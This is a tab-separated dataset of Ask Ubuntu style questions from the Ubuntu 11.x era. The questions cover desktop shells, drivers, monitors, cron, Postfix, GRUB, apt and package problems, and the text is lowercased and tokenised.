83314	email with evolution	being very new to ubuntu , which i really like , i now get the following message when i try and send an email : '' gpg : skipped `` xxxxxx.net '' : secret key not available gpg : signing failed : secret key not available '' , you may need to select different mail options can anyone help me ? i 've checked my account set up , and nothing changed . i did install this evening firewall configuration and gimp . appreciate it . i 'm still using version 11.04 by the way .
83326	change stackapplet tray icon to be more unity-like	with the current version of stackapplet from the software center ( thank you to this app 's developers , real basic , real useful app ) both the `` light '' and `` dark '' themes look out of place in comparison to the rest of the icons in the tray . dark blends in too much and light is the right color but is too large in comparison to the other icons . can i change the icon , or , better yet , can the default icon be changed to look better with unity ? thanks .
83333	can unity be uninstalled ?	recently when doing an update , i noticed i was downloading a bunch of packages related to unity . i use gnome-classic , and have no intention of ever using unity . so , i thought i might save myself some bandwidth and download times ( which can be slow on my laptop ) by removing unity . however , on next reboot , i could not get any form of gui interface . only by reinstalling unity was i able to get the log in interface and get back into gnome classic . can i get rid of unity , or is it somehow now integral to ubuntu in a way that makes ubuntu not run without it ( even if i 'm exlusively using gnome-classic ) ?
83334	will 12.04 default into unity the way 11.10 did ?	when i upgraded to 11.10 from 11.04 , on first boot i was put into the unity shell . however , since then , i have opted to use gnome-classic . my question is , when ubuntu 12.04 comes out next april , will it do the same thing and default to the unity shell and i 'll have to reinstall gnome and gnome-classic ? or will my gnome-classic interface and settings be preserved ?
83335	very slow 3g internet connection on ubuntu 11.10	i installed ubuntu 11.10 on dell laptop . i connected a phone with 3g connection to the laptop using bluetooth for internet . the net is very slow ... how can i fix this ? ? it was pretty fast on windows
83341	is there an equivalent to the mac os x software hazel ?	is there an equivalent to the mac os x software hazel that runs on ubuntu ? `` hazel watches whatever folders you tell it to , automatically organizing your files according to the rules you create . it features a rule interface [ .. ] . have hazel move files around based on name , date , type , what site/email address it came from [ .. ] and much more . automatically put your music in your music folder , movies in movies . keep your downloads off the desktop and put them where they are supposed to be . '' this question probably wo n't make sense unless you have used hazel , but basically you can define rules via the gui to move and rename files automatically to make an automated workflow .
83345	compiz desktop cube problem	i enabled the desktop cube and when i restart pc ... .on desktop i ca n't see anything and all panel on desktop are gone and at the time of login when i select ubuntu 2d then it works fine .
83350	user accounts missing after installing 11.10	i upgraded to ubuntu 11.10 from 11.04 with a usb installation . i chose install keeping old files ( other choices were install 11.10 alongside , and complete new install ) . during the upgrade it asked for my name and computer name . after the upgrade was finished and restarted , the other users ( there were two others previously ) has disappeared ! only my name is present . even using the other users account can not open the old accounts . but checking the home directory , their folders are still intact . what happened ? how do i correct this ? i 'm a newbie . thanks
83351	which is correct : `` gnome classic '' or `` gnome fallback '' ?	since the availability of unity and gnome shell , i have noticed widespread confusion over whether the more `` traditional '' version of the gnome desktop environment should be referred to as `` gnome classic '' or `` gnome fallback '' in 11.04 , 11.10 and later . what is the correct terminology to use ? also , does it differ by ubuntu version ?
83352	good alternative to netlimiter ?	there is a program netlimiter for windows . while i was using windows it was very useful for me to find out the ip address of the person who was downloading from me , or to know ip address of any person on lan who was using dc++ with some nick . and after that i can easily know the computer name of that person using nbtstat . i was wondering if there is any tool for ubuntu using which i can find out the ip address of person who is downloading from me or from whom i am downloading on lan . i am on university lan and we are using ptokax and dc++ for file sharing on lan . people sometimes put some offencive stuff on open chat on dc++ using some nick and i do n't know how to trace them while i am using ubuntu .
83358	samba is installed , why does n't gnome-file-share-properties work ?	samba and all it 's dependencies are installed . why does gnome-file-share-properties ( personal file sharing application ) say : this feature can not be enabled because the required packages are not installed on your system ? what packages am i missing ? edit : personal file sharing application may also be known by gnome-user-share .
83367	gnome-terminal and logging	is there any way to log every that was displayed in gnome-terminal ? for example i have a complex command dosomethingthatprintoutsalot ; dosomethingthatprintoutsalot2 ; dosomethingthatprintoutsalot3 i can add > file , but than i would have to do it for each command and i have to use tail in another console to see the output . maybe gnome-terminal support logging everything ? there is .bash_history , so ... . it might also support this .
83370	how to make a deb install only when the dependency is installed , or the conflicting packages are n't ?	i 'm making a package for cydia , but since it uses apt/dpkg , i thought i 'd ask this question here . i want my package to only install if gsc.wildcat ( represents an ipad ) is installed , or if gsc.front-facing-camera ( represents an iphone 4/4s ) is not installed . this setup would let the package only install on the 3gs or an ipad , but there 's no package that represents a 3gs that i know of . it also requires ios 5 ( firmware ( > = 5.0 ) ) . here 's an excerpt from my control file : depends : gsc.wildcat , firmware ( > = 5.0 ) conflicts : gsc.front-facing-camera how can i do this with only depends/conflicts ? ( please note that this question is about dpkg and not cydia . )
83371	duplicity ca n't connect to cloudfiles `` network is unreachable ''	whenever i click `` backup now '' in the backup gui , the smaller `` back up '' window opends , and after a while i get the following error message : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1359 , in with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1342 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1202 , in main action = commandline.processcommandline ( sys.argv [ 1 : ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/commandline.py '' , line 942 , in processcommandline globals.backend = backend.get_backend ( args [ 0 ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 156 , in get_backend return _backends [ pu.scheme ] ( pu ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/cloudfilesbackend.py '' , line 70 , in __init__ self.container = conn.create_container ( container ) file `` /usr/lib/python2.7/dist-packages/cloudfiles/connection.py '' , line 250 , in create_container response = self.make_request ( 'put ' , [ container_name ] ) file `` /usr/lib/python2.7/dist-packages/cloudfiles/connection.py '' , line 189 , in make_request response = retry_request ( ) file `` /usr/lib/python2.7/dist-packages/cloudfiles/connection.py '' , line 182 , in retry_request self.connection.request ( method , path , data , headers ) file `` /usr/lib/python2.7/httplib.py '' , line 955 , in request self._send_request ( method , url , body , headers ) file `` /usr/lib/python2.7/httplib.py '' , line 989 , in _send_request self.endheaders ( body ) file `` /usr/lib/python2.7/httplib.py '' , line 951 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 811 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 773 , in send self.connect ( ) file `` /usr/lib/python2.7/httplib.py '' , line 1154 , in connect self.timeout , self.source_address ) file `` /usr/lib/python2.7/socket.py '' , line 571 , in create_connection raise err error : [ errno 101 ] network is unreachable i use rackspace cloudfiles as a storage backend , last backup was 3 days ago ( successful . i have not changed any settings since then . edit it seems that the cause for this problem is network difficulties , for some reason i ca n't connect to one of the cloudfiles backend servers via https , and therefore it falls back to ipv6 for some reason and since i 'm not ipv6 enabled , it fails . i have yet to find the cause for this network issue . edit # 2 the issues is now resolved , it might have been solved by a router restart .
83375	citrix client installation and configuration in ubuntu 11.10 or 12.04	please tell me how to configure and install citrix client . detail procedure searched on google not able to find any document on 11.10
83376	how can i browse a folder currently open in nautilus in the terminal ?	i would like to be able to to this easily , in all of the following ways : keyboard shortcut right-click drag a folder into an open terminal ( with a certain mouse button ) drag the title bar into an open terminal ( with a certain mouse button ) how can this be done ?
83378	unable to install postgresql	i am trying to install postgresql on ubuntu . i tried installing it using the following command : apt-get install postgresql which results in reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : postgresql 0 upgraded , 1 newly installed , 0 to remove and 48 not upgraded . need to get 0b/23.2kb of archives . after this operation , 57.3kb of additional disk space will be used . debconf : delaying package configuration , since apt-utils is not installed selecting previously deselected package postgresql . ( reading database ... 42866 files and directories currently installed . ) unpacking postgresql ( from ... /postgresql_8.4.9-0ubuntu0.10.04_all.deb ) ... setting up postgresql ( 8.4.9-0ubuntu0.10.04 ) ... but postgresql is not installed properly . i tried purging and reinstalling it . but i am not able to find a solution . i am not able to find postgres under /etc/init.d .
83379	how to reenable autostart of compiz ?	after upgrading to 11.10 compiz wo n't start automatically and i have to run compiz -- replace after each reboot . how to start it automatically instead ?
83381	transparent menus ( for applications ) in gnome shell	how do i make menus look transparent in gnome-shell ? in unity , i use ubuntu-tweak to do this ( in ubuntu tweak , go to desktop- > compiz settings and then select enable transparent menus option ) . since compiz is no longer being used in gnome-shell , this is not working any more . any alternatives ? i love gnome-shell but i am still missing some awesome features of compiz like `` wobbly windows '' and other desktop effects !
83383	dell inspiron n5010 overheating	i 've installed ubuntu 11.10 on a dell inspiron n5010 . it gets too hot and is automatically shutdown . can anybody suggest why this is happening and how to fix it ? the application is use the most often are : eclipse with android plugin banshee player gimp wine the output of lsmod is : module size used by bnep 17923 2 rfcomm 38408 8 pci_stub 12550 1 vboxpci 22882 0 vboxnetadp 13328 0 vboxnetflt 27211 0 vboxdrv 251814 3 vboxpci , vboxnetadp , vboxnetflt parport_pc 32114 0 ppdev 12849 0 binfmt_misc 17292 1 joydev 17393 0 btusb 18160 2 bluetooth 148839 23 bnep , rfcomm , btusb snd_hda_codec_hdmi 31426 1 snd_hda_codec_idt 60049 1 arc4 12473 2 dell_wmi 12601 0 sparse_keymap 13658 1 dell_wmi uvcvideo 67271 0 dell_laptop 13519 0 dcdbas 14098 1 dell_laptop videodev 85626 1 uvcvideo snd_hda_intel 28358 2 snd_hda_codec 91754 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80468 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25241 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event snd_timer 28932 2 snd_pcm , snd_seq intel_ips 17753 0 snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq psmouse 63474 0 serio_raw 12990 0 iwlagn 273937 0 mac80211 393459 1 iwlagn snd 55902 14 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device cfg80211 172392 2 iwlagn , mac80211 i915 505143 8 soundcore 12600 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm wmi 18744 1 dell_wmi mei 36466 0 drm_kms_helper 32889 1 i915 drm 196322 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 18908 1 i915 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usbhid 41905 0 hid 77367 1 usbhid ums_realtek 13096 0 usb_storage 44173 1 ums_realtek uas 17699 0 ahci 21634 4 libahci 25761 1 ahci r8169 47200 0
83392	how can i get desktop notifications on irssi ?	i 'm using irssi on gnome 3 , but i do use kde 4 sometimes . i like irssi very much but i miss any notification feature . i do n't use irssi over ssh .
83394	synching folders other than the default ubuntu one folder does n't seem to work on windows	i have installed ubuntu one on two machines - one windows 7 and one windows xp . i have added a folder from the computer using the `` add folder '' button on the windows 7 machine . the ubuntu one dialog box tells me that file synch is finished and up to date . i now have two problems . if i log on to my ubuntu one account on the web , i can see what appears to be a link to the synched folder - i can not open the folder and see the contents . this is what i see in the files page of my ubuntu one account : ~/documents/computing/test on the second machine , after synching is complete , i see the folder but not the contents . the folder is empty . can anyone provide a solution as to a ) what is happening and b ) how do i get this folder to synch properly on the other locations ?
83397	how to install jdk7 for eclipse ?	i have installed eclipse using ubuntu software center , so i need to install jdk 7 . i have visited java download page but i was confused which package i should take also i do n't know how to add this jdk to eclipse ? thx advanced .
83400	in there an indicator applet for gnome panel 3 ?	i 've been exploring gnome panel 3 in 11.10 for a while now , and i think it 's really great . however , i would really like to use indicators the same way as it 's used in 10.04 . is that possible yet , and if so , how do i do it ?
83403	how to uninstall ubuntu 11.10 in netbook	i have installed ubuntu 11.10 on my acer netbook as a dual boot with the default windows xp on said netbook . now i need only windows xp and want to completely uninstall ubuntu 11.10 , there is no cd drive in my netbook . any help would be greatly appreciated .
83411	screenlets change position after restart	i have a problem with my screenlets . they change position on the screen after i restart the computer . this is a known bug according to : https : //bugs.launchpad.net/screenlets/+bug/885322 however a temporary workaround could be to delay the startup of the screenlets to avoid this . now i wonder : how do i modify the ~/.config/autostart/xxx.desktop the best way to atchive this . there is a comment in the bug report about exec sleep 5 something , but i dont really understand how to write this exactly in the file . is there any otherway to solve this ? using ubuntu 11.10 and screenlets 0.1.5 .
83413	midi input recorder	i have a ( musical type ) keyboard with a usb connection for midi input . i am able to connect with drumstick virtual piano and see the keys geing pressed on screen and also to hear from the keyboard when i press keys on the computer . what is a program i can use to record from the keyboard as midi input ?
83416	alternative to unity web search lens	this lens stopped working in ubuntu 11.10 . does anyone know of any alternatives that work in ubuntu 11.10 ? this is a useful lens that i miss having in ubuntu 11.04 .
83421	passing 2 parameters to `` open with.. ''	i do a lot of diffing and i would like to have kdiff3 under `` open with ... '' . when from console i execute kdiff3 file1 file2 then kdiff is runned and it compares those two files . however this does not work with `` open with '' . if i select two files and click `` open with ... '' and type `` kdiff3 '' then kdiff is runned with only first file . is it possible to pass two files to kdiff as open with ?
83423	how to activate this crontab ?	i have a setup as below but its never getting executed . $ chmod +x /var/tmp/myscript.sh $ vim /var/tmp/crontab.sh ; * * * * * sleep ( 10 ) ; /var/tmp/myscript.sh $ crontab /var/tmp/crontab.sh now just , noticed its not working . what am i doing wrong ? $ grep cron /var/log/syslog nov 28 15:20:01 sun cron [ 1768 ] : ( sun ) cmd ( sleep ( 10 ) ; /var/tmp/myscript.sh ) nov 28 15:20:01 sun cron [ 1766 ] : ( cron ) error ( grandchild # 1768 failed with exit status 2 ) nov 28 15:20:01 sun cron [ 1766 ] : ( cron ) info ( no mta installed , discarding output ) follow up : $ vim /var/tmp/crontab.sh * * * * * sleep 10 ; /var/tmp/myscript.sh > /dev/null 2 > & 1 $ tail -f /var/log/syslog | grep cron nov 28 15:50:02 sun cron [ 2301 ] : ( sun ) cmd ( sleep 10 ; /var/tmp/myscript.sh > /dev/null 2 > & 1 ) nov 28 15:51:01 sun cron [ 2312 ] : ( sun ) cmd ( sleep 10 ; /var/tmp/myscript.sh > /dev/null 2 > & 1 )
83424	ca n't enable 3rd monitor after installing ati proprietary drivers	so , after hearing how ubuntu 11.10 was supposed to have improved support for multiple monitors , i had to re-install again and give it a try . i always found ubuntu gets more done faster related to productivity than windows does , among other things , though video games and the adobe creativity suite prevent me from deleting my windows install altogether . i had given up trying to work with ubuntu because of it 's lack of multi-monitor support , so now that it has improved ... and it has improved . only seconds after installation , i had full resolution running on all 3 monitors across a single desktop , and each monitor even has a top bar ! the performance left something to be desired , however , and it eventually irritated me enough to try to get the proprietary drivers working . all 3 monitors working was a surprise , as i am using 1 dvi connection , 1 vga connection , and 1 hdmi connection on a hd6850 . in windows , to enable a third monitor , one of the monitors must be attached through the display port . thank you for whoever hacked that one . the problem is , now that i installed the proprietary drivers , i can not enable my third monitor anymore . amd ccc gives me an error saying it does n't know why but it ca n't be enabled , and something about possible not enough video memory ( though its a 1gb card ) . does anyone know if there is some kind of tweak i can perform to get the third monitor working again ? i know there are a lot of parameters that can be thrown with aticonfig , though none i have found seemed relevant . any help is appreciated .
83426	login via face detection	is there any package/.deb that enables the user to automatically login into ubuntu detecting the face of the user ? i 'm using ubuntu 12.04
83431	how to download the video files on internet ?	like internet download manager for windows , is there any software to download all files like videos , audios , softwares and all other files in ubuntu 11.10 ?
83432	trouble to use opengl on onboard amd aspeed card	i 'm having trouble to use opengl - glx with my onboard graphic card aspeed ast2050 , resolution 1600x1200 60hz on ubuntu 11.10 . surprisingly , it works when i first install ubuntu 11.10 on my machine amd 6168 x 19 , 64 bit . however , after i reboot the machine , or run any update on the system , i lost the glx resource from my graphic card and can not restore the original configuration . how can i fix this problem ? is there i easy way to do it ? i google some solutions , but any works with my specific onboard graphic card . why ubuntu standard updates are destroying the correct configuration that comes on the original installation ? i will appreciate it you could help me to really put opengl up and running again . thanks .
83434	add virtualbox shortcut in unity launcher to boot to a vm	can i create a shortcut to a virtualbox os in the unity sidebar without it being on the desktop too . i tried to right click in virtualbox and create shortcut on desktop then move it . but if i do it then delete the desktop shortcut it renders the unity shortcut useless . any ideas ?
83435	ubuntu taking random screenshots ?	this probably sounds crazy , but at random times , ubuntu 11.10 takes a ton of screenshots at the same time , and then more after that . you hear the clicking sound repeatedly and the dialogue pops up over and over and over . this totally crashes the os , i had to boot into windows to be able to post this . i have n't installed anything recently that could be causing this , is there a solution ? edit : it 's just the regular print key shortcut , and i 'm on a laptop so i 'll make sure the key is okay . the screenshot plugin in ccsm is disabled . this was happening a few days ago but it stopped , so i 'll just disable it if it happens again . thanks for the help ! : )
83441	how can i get notifications of new emails ?	i was wondering , is there any way to get an on-screen notification when a new email is received , like in google talk . for example , like this :
83450	gtk error upon creating a project with quickly	i 'm very new to linux ( having come from os x ) but am keen to start writing some gui desktop apps for ubuntu . i have installed the quickly terminal app and created a new project called 'myfirstapp ' . the project created and launched fine but the terminal displayed 4 identical errors ( shown below ) : ( myfirstapp:14519 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( myfirstapp:14519 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( myfirstapp:14519 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( myfirstapp:14519 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , congrats , your new project is setup ! cd /home/garry/myfirstapp/ to start hacking . my new app seems to work fine but what does this error mean ?
83454	x server display configuration page will not load	the x server display configuration page will not load due to `` failed to query noscanout for screen 0 '' . so , the display control panel in system settings does not recognize that the second monitor exists and it thinks that the primary monitor unknown . how do i get ubuntu to recognize both my monitors and set them up in twinview ? please give detailed instructions as i am very new to this . i am running ubuntu 11.10 i have a dell u2410 and a vizio va19l hdtv10t lcd displays . running from an nvidia geforce4 mx400 video card . the dell is using the video card 's vga interface and the vizio is using its hdmi input from the the video card 's dvi interface . the resolution of both is set to 1600x1080 . everything works perfectly in windows 7 .
83456	how to get postfix to send/forward/relay to a sub-domain located on another server ?	i have a quick question . how do i setup postfix to send an email to another server ( exchange server ) when sending to an email address that has a sub-domain of our main server . for example , say our main server is mail.example.com and we have a exchange server setup to receive emails from exchange.example.com . we have the mx records setup in our dns and it receives correctly if we send from a gmail account . however , when we try to send an email from a @ example.com account we get the following error : host or domain name not found . name service error for name=exchange.example.com type=a : host not found i believe postfix checks for local mailboxes first and if its setup with the domain it delivers to the local account , but in this case the sub-domain accounts are located in another server . anyone have any thoughts on what i need to do within postfix so it does n't look locally for the exchange.example.com mailboxes ? thanks for your help .
83457	x does n't start on boot	i installed my new computer today with 11.10 ( i5-2500k , asus p8z68-v lx , using the onboard graphic processor ) . after updating everything went fine but then i tried to go to standby-mode . this crashed the computer so i had to cold-reset it . now the display manager does n't come up on boot anymore . i need to login into a shell and type sudo service lightdm restart . after that the login comes up normally . the xorg.0.log says , that there were no monitors found i have not changed the default display manager to gdm and then back . /etc/x11/default-display-manager says `` /usr/sbin/lightdm '' thanks in advance
83458	where can i find icon sets for unity ?	i really dislike the default monochrome icons in unity 's global menu and in thunderbird , but i have n't been able to find a source for alternative icons . any tips ?
83459	internet download speed decreases over wifi	i have a d-link wireless router and an adsl 5mb/s connection . the router have a qnap box and a boxee box connected with 100/10 network cable , also we got my wife pc ( running win7 ) my pc ( dual boot win7 / ubuntu 11.10 ) , my laptop ( dual boot win7 / ubuntu 11.10 ) and my mobile ( android 2.3 ) . i 've used speed test to monetize my internet download speed , i 've run these tests on my pc , my wife pc and my cellphone ( they 've got an app for that ) . beside my pc , all the devices showed a ~ 5mb/s download stream while my pc showed things like 0.1mb/s < > 0.8mb/s . if i disconnected the wifi connection and than reconnected - the speed test showed a 5mb/s download speed for few tests , but after a minute or so - the connection dropped down to the under 1mb/s limit . doing the same tests on my pc using windows 7 showed no such problems and the connection was steady at 5mb/s . i 've searched around askubuntu and tried several things ( turned off ipv6 and power management ) but with no success . ideas ? $ sudo lshw -c network *-network description : wireless interface product : rt2500 802.11g vendor : ralink corp. physical id : 7 bus info : pci @ 0000:01:07.0 logical name : wlan0 version : 01 serial : 00:0e:2e:57:80:39 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2500pci driverversion=3.0.0-12-generic firmware=n/a ip=192.168.1.15 latency=64 link=yes multicast=yes wireless=ieee 802.11bg resources : irq:18 memory : f9ffe000-f9ffffff
83461	automatically mount ntfs drive when i login	i use ubuntu 11.10 and windows7 dual boot with ubuntu as my primary os . every time i need to access a document i need to mount the respective drive , though this is not at all tiresome , still , is there any way that drives becomes automatically mounted when i login ?
83470	how do i change how executable files are handled by the file manager ?	when i double click on text files , nautilus asks me what i would like to do with them . i find this to be intrusive , as i just want them to open . how can i fix this ? note : this question is a `` canonical '' question on the subject ; edit if needed . note 2 : text files can be html , css , txt , and more .
83472	i can not solve the `` install these packages without verification '' problem	i googled and googled and i just can not find a solution to this problem : sudo apt-get install < whatever > gives me : warning : the following packages can not be authenticated ! and install these packages without verification [ y/n ] ? i can not find a decent solution . the closest i got was to run : sudo apt-get install debian-keyring debian-archive-keyring but then , even thought , and against my good judgment i agreed to install the package without confirmation , i get : ( i replaced http with xxxx because of forum limitations ) . install these packages without verification [ y/n ] ? y err xxxx : //il.archive.ubuntu.com gutsy/universe debian-archive-keyring 2007.02.19-0.1 404 not found err xxxx : //il.archive.ubuntu.com gutsy/universe debian-keyring 2005.05.28 404 not found failed to fetch xxxx : //il.archive.ubuntu.com/ubuntu/pool/universe/d/debian-archive-keyring/debian-archive-keyring_2007.02.19-0.1_all.deb 404 not found failed to fetch xxxx : //il.archive.ubuntu.com/ubuntu/pool/universe/d/debian-keyring/debian-keyring_2005.05.28_all.deb 404 not found e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? trying to run apt-get update also does not help : i get tons of `` 404 not found '' errors . can someone please direct me to a good solution to this problem ? i can not understand why this issue is not better documented . there must be a simple solution which allows me to update my list of sources or whatever .
83473	how to execute script on shutdown ?	i want to execute script before i shutdown my machine that writes date to a file ( so i do know what time i finish working ) . how to do it ?
83475	few problems on dell xps 15 l502 ( screen brightness , bluetooth , wi-fi power management problems )	i am running ubuntu 11.10 32bit in my dell xps l502 . working well except for a few problems . blue tooth always turned on reboot , i would like to turn it off always . screen brightness is not saved . every time i reboot , the screen goes back to full brightness.how to save that ? and the most important problem is internet speed through wi-fi is really very slow when operating on battery.the card is intel centrino advanced-n 1030 with integrated bluetooth . any help will be appriciated ... : )
83478	french version of ubuntu-one for windows	i 'm a french new user and i 'd like to show ubuntu-one working on windows for newbies . the problem is that the windows application is downloadable in english and iâd like it in french . is there a french version of ubuntu-one for windows ?
83481	how do you import music on mp3 at 320 kbps in banshee , or any other media player ?	when you import music to banshee the default bitrate seems to be 128kbps ( i do n't like this , disk space is cheap so give me the highest quality please ) , how do you change this to be something like 320 kbps ? or are we stuck with this ?
83484	what is the current state of apple device ( iphone , ipod , etc . ) support ?	what ubuntu applications provide support ? ( guides , how to 's , status ) also , specifically , details on support for syncing music to iphone 's and ipod 's with the latest os version : can you sync music to apple devices using > ios4 ? ( iphone & ipod ) what applications allow you to do this and how ? ( guides , how to 's , status ) what has already been established is : apple does not support linux and has no plans to . libimobiledevice provides some support , however it currently does not support music/video synchronization with devices > ios4 . go to libimobiledevice and scroll to the section titled `` status '' to see if your device version is supported .
83487	switch between ubuntu and windows 7	is it at all possible to switch between windows and ubuntu by press of a button , on a system with windows 7 - ubuntu 11.10 dual boot set up ?
83489	what is the difference between add-apt-repository & apt-add-repository ?	difference between add-apt-repository & apt-add-repository ?
83494	grub install to wrong partition has broken windows startup	when i installed ubuntu 11.04 there was an option to choose something about the grub loader . the options were for each partition or the entire hard disk . i accidentally chose the windows partition and now i ca n't load it . any suggestions ... ? what it 's location should be ( grub 's location ) ?
83500	keyboard shortcuts in gnome-classic	i am using gnome-classic in ubuntu 11.10 & i am not able to figure out the shortcut for the `` applications '' list and `` places '' list .
83502	getting to virtual terminal with keytouch overriding fn keys	i have a chromebook running ubuntu that i just broke . i had everything on the internal harddrive for the computer , but ran out of space , so i decided to move my home partition onto a memory card that would stay in it 's slot . i setup my home partition on the memory card and changed the fstab file to point to it as the home partition . when i rebooted my system i could n't login to my user ( kept refreshing the login screen when i enter username and password ) . after figuring out that the problem was with my new home partition i figured i 'd just boot to a virtual terminal and change everything back since i should 've been able to login there from what i 've read on other forums . the problem is that i have keytouch running which overrides all of my fn keys so i ca n't get to a virtual terminal . is there another way , from the login screen , to get to some form of a terminal that can edit the fstab file and move directories around ? i am running ubuntu desktop 11.10
83504	can grub2 menu be hidden a la windows ?	is there a way to hide the grub2 menu so that it does not show by default and boots off the pre-selected os immediately unless another key , like f8 in windows , is pressed after bios to intercept the boot ?
83506	directory bookmarks for open/save files in matlab	i have matlab 7.11.0 ( r2010b ) under my ubuntu 10.10 . every time i need to save a new file edited in its editor , matlab starts from my $ home address , so i have to manually go directory by directory before getting to my destination . i wonder if there is some way either by or outside matlab that can made it smart to use the bookmarks in nautilus , or store some history for quick accessing previous directories ? thanks and regards !
83518	what are mountpoints , and which one should i pick ?	when a ubuntu is fresh installed an option called mount point is shown in advanced install.on clicking it i get a dropdown list with options : / /home /bin swap etc what exactly are they ? and which one is best suited for 11.10 ?
83519	unable to use cd/dvd drive after upgrade to 11.10	just after my upgrade to ubuntu 11.10 i can not use my cd/dvd drive . the problem is that in nautilus the cd/dvd icon appears ok , but , when i put any kind of media on the cd/dvd driver , the icon vanishes and i can not mount ( even by my self with pmount , mount , etc ) the driver . does anyone else have this strange behavior ?
83520	where is search on ubuntu software center ?	it seems to have disappeared . the menu edit/search does n't work , either . i 've filed a launchpad bug-report .
83521	where do i need to change `` ubuntu '' when naming my own custom distribution ?	i am building my own distro ( which i am almost done ) but one thing left is the name of it . since i am not sure what to name it im leaving the `` ubuntu '' there i know i will have to change the following files /etc/lsb-release /etc/issue to my own name and version and code name . am i missing other files ? ( on my site it shows it 's an ubuntu version - i read the tm etc ... but i want the name of my distro to be there ) thanks
83524	why ca n't i upgrade my kernel via the terminal ?	if i type sudo apt-get update & & sudo apt-get upgrade i can only see that the kernel packages are kept back , and not installed . as the screenshot shows . if i then start the update manager i can install the kernel , with no problems at all . as the second screenshot shows . why is this ?
83528	what packages did midori install for it to run that i should uninstall to be completely rid of midori ?	i 've installed midori , tried it , and disliked it , so i 've uninstalled it . problem is , i forgot to keep track of what packages midori installed along with itself , and since i 'm trying to get rid of midori completely , including all of the other extra packages it installed , i 'm wondering if anyone happens to know what those packages are . i 've installed good ole ' chromium afterwards , and are there any packages that chromium uses that were installed by midori as well ? if not , what are the extra lib packages and whatnot that midori installed besides the basic browser itself in order to run ? thanks , icedrake
83530	pcre compilation errors on 11.10 ( but not on 10.10 and 11.04 )	i compile a project in c + + . the project uses a library pcre . the project is not written by me . i run the sh-file . on ubuntu 10.10 and 11.04 is compiled . at 11.10 - no . this error occurs when : g + + morphgen.orst-wl , - start-group -l/usr/local/lib-lpcrecpp -l/usr/local/lib-lpcre -l../lemmatizerlib /-llemmatizerrst -l../agramtablib /-lagramtabrst -l../graphanlib /-lgraphanrst -l../structdictlib /-lstructdictrst -l../morphwizardlib /-lmorphwizardrst-wl , - end-group-o morphgen note that-lpcre and-lpcrecpp present . errors : .. / morphwizardlib / / libmorphwizardrst.a ( pcre_rml.orst ) : in function `_zn6rml_re7compileens_6anchorepkh.constprop.41 ' : pcre_rml.cpp : ( . text +0 x31 ) : undefined reference to `pcre_compile ' pcre_rml.cpp : ( . text +0 xa3 ) : undefined reference to `pcre_compile ' .. / morphwizardlib / / libmorphwizardrst.a ( pcre_rml.orst ) : in function `rml_re : : ~ rml_re ( ) ' : pcre_rml.cpp : ( . text +0 x25d ) : undefined reference to `pcre_free ' pcre_rml.cpp : ( . text +0 x26f ) : undefined reference to `pcre_free ' .. / morphwizardlib / / libmorphwizardrst.a ( pcre_rml.orst ) : in function `rml_re : : compile ( rml_re : : anchor , unsigned char const * ) ' : pcre_rml.cpp : ( . text +0 x366 ) : undefined reference to `pcre_compile ' pcre_rml.cpp : ( . text +0 x3d4 ) : undefined reference to `pcre_compile ' .. / morphwizardlib / / libmorphwizardrst.a ( pcre_rml.orst ) : in function `rml_re : : trymatch ( pcrecpp : : stringpiece const & , int , rml_re : : anchor , int * , int ) const ' : pcre_rml.cpp : ( . text +0 x60f ) : undefined reference to `pcre_exec ' .. / morphwizardlib / / libmorphwizardrst.a ( pcre_rml.orst ) : in function `rml_re : : numberofcapturinggroups ( ) ' : pcre_rml.cpp : ( . text +0 x2248 ) : undefined reference to `pcre_fullinfo ' .. / morphwizardlib / / libmorphwizardrst.a ( pcre_rml.orst ) : in function `_global__sub_i__z17rmlpcremaketablesrst6vectorihsaihee17morphlanguageenum ' : pcre_rml.cpp : ( . text.startup +0 x43 ) : undefined reference to `pcrecpp : : arg : : parse_null ( char const * , int , void * ) ' collect2 : ld execution completed with return code 1 make : *** [ morphgen ] error 1 make : leaving directory `/ home / petr / rml / source / morphgen ' fail running make-c / home / petr / rml / source / morphgen mode = release !
83532	how do i set up new users with skel	i have on my server a settings i use for all my users . every time i create a new user i have to copy all the settings over and over . for example : .vimrc . .profile .bashrc firefox homepage to our intranet evolution settings ( server and username ) etc ... i saw skel can do it , is there a easy way to setup a user with my settings when i adduser ? thanks
83534	is it safe to download most desktop environments ?	i tend to switch back and forth from different environments within the *buntu ecosystem but i was wondering if i could just install all of the desktop environments onto ubuntu 11.10 and be able to switch to them if i wanted to .
83538	monitor resolution changes after login ( lower than optimal )	problem : boot and loginscreen resolution are o.k . - 1366x768 , but after login the resolution drop down to 1024x768 . in the options i can select the 1366x768 resolution again , but looks like it does n't save it , because in the next reboot it drop back again to 1024x768 . i have a intel integrated video card , on dell inspiron 1545 running ubuntu 11.10 , 4gb ram & 320 hd .
